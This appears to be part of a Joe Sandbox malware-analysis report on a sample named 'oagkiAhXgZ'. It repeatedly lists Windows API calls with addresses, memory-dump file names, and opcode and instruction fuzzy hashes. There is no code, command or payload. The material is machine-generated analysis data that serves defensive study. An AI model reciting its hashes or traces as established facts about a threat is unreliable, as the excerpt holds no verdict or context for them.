                                                                                                    • Instruction ID: b0a9ee486d5003ea2cec3daa219ec71a0c0f8276e6cc521e0d1931f7a0075eec
                                                                                                    • Opcode Fuzzy Hash: 2112801a539cdb9e4d5cbe19b0ca1418a930435dc3b23b4419dcd9986a877fd1
                                                                                                    • Instruction Fuzzy Hash: 0A21A472610218BBEF218F54DC85FBB37EEEF89B54F218154F9059B190CA71DC5287A0
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00B14A08
                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B14A5C
                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,00B3CC08), ref: 00B14AD0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                    • String ID: %lu
                                                                                                    • API String ID: 2507767853-685833217
                                                                                                    • Opcode ID: ad8ce5dfd99672438e667a9fb036fd3a118637981aae1b03ca3b480c8fba20d7
                                                                                                    • Instruction ID: 1447aaa2aa708bdca3bfd3dc56399def61ea26b820e69b992986dca5b828122e
                                                                                                    • Opcode Fuzzy Hash: ad8ce5dfd99672438e667a9fb036fd3a118637981aae1b03ca3b480c8fba20d7
                                                                                                    • Instruction Fuzzy Hash: 09316575A00109AFD710DF54C985EAEBBF8EF09318F148095F509EB262DB71ED45CB61
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B3424F
                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B34264
                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B34271
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID: msctls_trackbar32
                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                    • Opcode ID: 8781df4b4f7c05d5d42453fb9d0d912892bbba8e32bd7d287d740a031ef7ece9
                                                                                                    • Instruction ID: 48f35ef448706b0fed6d969a13451bece13363efba99369aeb4a35183aae39e9
                                                                                                    • Opcode Fuzzy Hash: 8781df4b4f7c05d5d42453fb9d0d912892bbba8e32bd7d287d740a031ef7ece9
                                                                                                    • Instruction Fuzzy Hash: 6D119E31250248BEEF205E69CC46FAB3BECEB95B64F214524FA55E60A0D671E8519B20
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                                                                                                      • Part of subcall function 00B02DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B02DC5
                                                                                                      • Part of subcall function 00B02DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B02DD6
                                                                                                      • Part of subcall function 00B02DA7: GetCurrentThreadId.KERNEL32 ref: 00B02DDD
                                                                                                      • Part of subcall function 00B02DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B02DE4
                                                                                                    • GetFocus.USER32 ref: 00B02F78
                                                                                                      • Part of subcall function 00B02DEE: GetParent.USER32(00000000), ref: 00B02DF9
                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00B02FC3
                                                                                                    • EnumChildWindows.USER32(?,00B0303B), ref: 00B02FEB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                    • String ID: %s%d
                                                                                                    • API String ID: 1272988791-1110647743
                                                                                                    • Opcode ID: cd3b5e3f3448e9616aafd2b04ab3d5a4da59151f778f63777a925cafb48f4191
                                                                                                    • Instruction ID: c7487b750f10b20e313aea07aa0f158331cc09a25511bcd4d21883ea8e1f4953
                                                                                                    • Opcode Fuzzy Hash: cd3b5e3f3448e9616aafd2b04ab3d5a4da59151f778f63777a925cafb48f4191
                                                                                                    • Instruction Fuzzy Hash: 8111A2716002056BDF157FA48D8AFED7BEEAF84304F1440B9F909AB1D2DE3099498B70
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00B358C1
                                                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00B358EE
                                                                                                    • DrawMenuBar.USER32(?), ref: 00B358FD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$InfoItem$Draw
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 3227129158-4108050209
                                                                                                    • Opcode ID: 8da3067d1865d2d9506a348703f8fc4c81174d34445cb0aaf5e6e88721f3b165
                                                                                                    • Instruction ID: 7bb82e104463b28752491e38a6aa6c01701ec2aec429442bd868a5a4684bdd50
                                                                                                    • Opcode Fuzzy Hash: 8da3067d1865d2d9506a348703f8fc4c81174d34445cb0aaf5e6e88721f3b165
                                                                                                    • Instruction Fuzzy Hash: CE012D31500218EFDB219F51DC85BEEBBB9FB45361F2480D9E849D6251DB309A94EF31
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5770f61f7d5c910dde0dc6a70c425a9cfbcd4b7c9d5809f0455f20a5ba8048b5
                                                                                                    • Instruction ID: 1d984fb823ecd9b972eb288014b59259ecf6dc4f349f0b03f52d86de6a809bb9
                                                                                                    • Opcode Fuzzy Hash: 5770f61f7d5c910dde0dc6a70c425a9cfbcd4b7c9d5809f0455f20a5ba8048b5
                                                                                                    • Instruction Fuzzy Hash: 71C13775A1020AEFDB15DFA4C894BAEBBB5FF48304F208598E505EB291D731EE41CB94
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 1998397398-0
                                                                                                    • Opcode ID: e6a605b5520db47fcee25b880cf1d40c7d85d78e6da8e1c1b5e64e2e4dfc1e4c
                                                                                                    • Instruction ID: 5f5e3fae79927ed006117f5ff4b5f48b41f373a8692586551b08cde933ffe858
                                                                                                    • Opcode Fuzzy Hash: e6a605b5520db47fcee25b880cf1d40c7d85d78e6da8e1c1b5e64e2e4dfc1e4c
                                                                                                    • Instruction Fuzzy Hash: D5A16D756043119FC700EF24D985A2EB7E5FF89714F048899F98A9B3A2DB34EE01CB91
                                                                                                    APIs
                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B3FC08,?), ref: 00B005F0
                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B3FC08,?), ref: 00B00608
                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00B3CC40,000000FF,?,00000000,00000800,00000000,?,00B3FC08,?), ref: 00B0062D
                                                                                                    • _memcmp.LIBVCRUNTIME ref: 00B0064E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 314563124-0
                                                                                                    • Opcode ID: d176e47009348dcbbb2243b8e8c2a4cee34fdaaf30de3e348bb2dd8f14e85689
                                                                                                    • Instruction ID: 888a84b7355de5a58fd8cbaaa89bc4b9bf365f4c9948778ae298656a71923c6d
                                                                                                    • Opcode Fuzzy Hash: d176e47009348dcbbb2243b8e8c2a4cee34fdaaf30de3e348bb2dd8f14e85689
                                                                                                    • Instruction Fuzzy Hash: B781EE75A10109EFCB04DF94C984EEEBBF9FF89315F204598E516AB290DB71AE05CB60
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 7396a0d2efb3b7ac5a69a67ba40c5c6585b898cd31d093870f8179087b4e0ae1
                                                                                                    • Instruction ID: 56d23e42f2474cee3c0db800be2c7658a5719a0ddae2eb282c1341b7eba3b5f6
                                                                                                    • Opcode Fuzzy Hash: 7396a0d2efb3b7ac5a69a67ba40c5c6585b898cd31d093870f8179087b4e0ae1
                                                                                                    • Instruction Fuzzy Hash: DF415CB1A00561ABDB216BBA8D45BBE3AF5EF41330F15422AF41AD73D2E63488419361
                                                                                                    APIs
                                                                                                    • GetWindowRect.USER32(015CE8A0,?), ref: 00B362E2
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00B36315
                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00B36382
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3880355969-0
                                                                                                    • Opcode ID: 51f874f72453d59638f77eeca9508354d002695b8aedd4a0430847dffa99af07
                                                                                                    • Instruction ID: c2df02068af4e2a5099a4dfd91394345eedcf07d2e2543535ba2db1f031dd985
                                                                                                    • Opcode Fuzzy Hash: 51f874f72453d59638f77eeca9508354d002695b8aedd4a0430847dffa99af07
                                                                                                    • Instruction Fuzzy Hash: 74512A75A00209EFCB14DF68D881AAE7BF5EB45360F208599F9559B2A0DB30ED81CB50
                                                                                                    APIs
                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00B21AFD
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00B21B0B
                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B21B8A
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00B21B94
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$socket
                                                                                                    • String ID:
                                                                                                    • API String ID: 1881357543-0
                                                                                                    • Opcode ID: 3f6fdbfe69efc8a4fe28cc982e5bbf441d20e4e6c97e6b7273ca58b1703d4bcd
                                                                                                    • Instruction ID: 8c4f5287ddb4afc14f1f9eeaa351cc07f93d9ac0275d2fcd181901b98733a144
                                                                                                    • Opcode Fuzzy Hash: 3f6fdbfe69efc8a4fe28cc982e5bbf441d20e4e6c97e6b7273ca58b1703d4bcd
                                                                                                    • Instruction Fuzzy Hash: D841D234600210AFE720AF24D98AF6A77E5EB45718F548488F91A9F3D3D772DD418B90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4390cb0066a7d4c61633dc47aca3ccad195d028f5b5e2e7064a866d23a41a0c5
                                                                                                    • Instruction ID: 96c7ad1245768278f5f3992e1a7f0ee2fb1dad707bfb7c237176bc95996b5a78
                                                                                                    • Opcode Fuzzy Hash: 4390cb0066a7d4c61633dc47aca3ccad195d028f5b5e2e7064a866d23a41a0c5
                                                                                                    • Instruction Fuzzy Hash: 2F41E2B6A10354EFD724DF38C941BAABBB9EB88710F11852FF152DB382D771990187A0
                                                                                                    APIs
                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B15783
                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00B157A9
                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B157CE
                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B157FA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3321077145-0
                                                                                                    • Opcode ID: 783ccad5cc1cdf13e153297da33934e1cb815d46b4e1223d5bae4ca28d75eda3
                                                                                                    • Instruction ID: fe77daf749fdbb8867f7f80e58f33e92aff4074c4ac4bb44324a0ee6a824aa77
                                                                                                    • Opcode Fuzzy Hash: 783ccad5cc1cdf13e153297da33934e1cb815d46b4e1223d5bae4ca28d75eda3
                                                                                                    • Instruction Fuzzy Hash: D141EE35600611DFCB11EF55C585A5EBBE2EF89720F19C498E84A6B3A2CB34FD41CB91
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00AC6D71,00000000,00000000,00AC82D9,?,00AC82D9,?,00000001,00AC6D71,8BE85006,00000001,00AC82D9,00AC82D9), ref: 00ADD910
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00ADD999
                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00ADD9AB
                                                                                                    • __freea.LIBCMT ref: 00ADD9B4
                                                                                                      • Part of subcall function 00AD3820: RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                    • String ID:
                                                                                                    • API String ID: 2652629310-0
                                                                                                    • Opcode ID: 4fc04d4d690ba4f005263ac7a4818ccec89edc60ff70c375f2475029bbc68fb1
                                                                                                    • Instruction ID: faa9288d3a046d32e1e076f526d11507a5a8a63ae150b1ce3e678e5d4a91076c
                                                                                                    • Opcode Fuzzy Hash: 4fc04d4d690ba4f005263ac7a4818ccec89edc60ff70c375f2475029bbc68fb1
                                                                                                    • Instruction Fuzzy Hash: 4531E172A0020AABDF24CF64DC95EAE7BA5EB40310F154169FC05E7250EB36DD50CB90
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00B35352
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B35375
                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B35382
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B353A8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3340791633-0
                                                                                                    • Opcode ID: 373a5ae92b169e32b899c45a6eda6febc0a603a7f2d4f84a57bd211b605a8560
                                                                                                    • Instruction ID: dd108bd414795780087aac621d27d72de63830fd7087d61baa52b60ac2869eff
                                                                                                    • Opcode Fuzzy Hash: 373a5ae92b169e32b899c45a6eda6febc0a603a7f2d4f84a57bd211b605a8560
                                                                                                    • Instruction Fuzzy Hash: 8931C434A95A0CEFEB309E58CC46BE837E5EB05390F784181FA12971E1C7B0AD80DB59
                                                                                                    APIs
                                                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00B0ABF1
                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00B0AC0D
                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00B0AC74
                                                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00B0ACC6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 432972143-0
                                                                                                    • Opcode ID: c50a435c95d856e2e8f3a4c99140113a5d524e1da18e9b42fc92dd63484d4304
                                                                                                    • Instruction ID: 64ac2889beab969415f735c4b64a96dda914ea365095ebf7c5e0b1885f80a664
                                                                                                    • Opcode Fuzzy Hash: c50a435c95d856e2e8f3a4c99140113a5d524e1da18e9b42fc92dd63484d4304
                                                                                                    • Instruction Fuzzy Hash: 32311030A04718AFFB358B648C09BFE7FE5EB89310F098A9AE485971D1C77499858792
                                                                                                    APIs
                                                                                                    • ClientToScreen.USER32(?,?), ref: 00B3769A
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B37710
                                                                                                    • PtInRect.USER32(?,?,00B38B89), ref: 00B37720
                                                                                                    • MessageBeep.USER32(00000000), ref: 00B3778C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
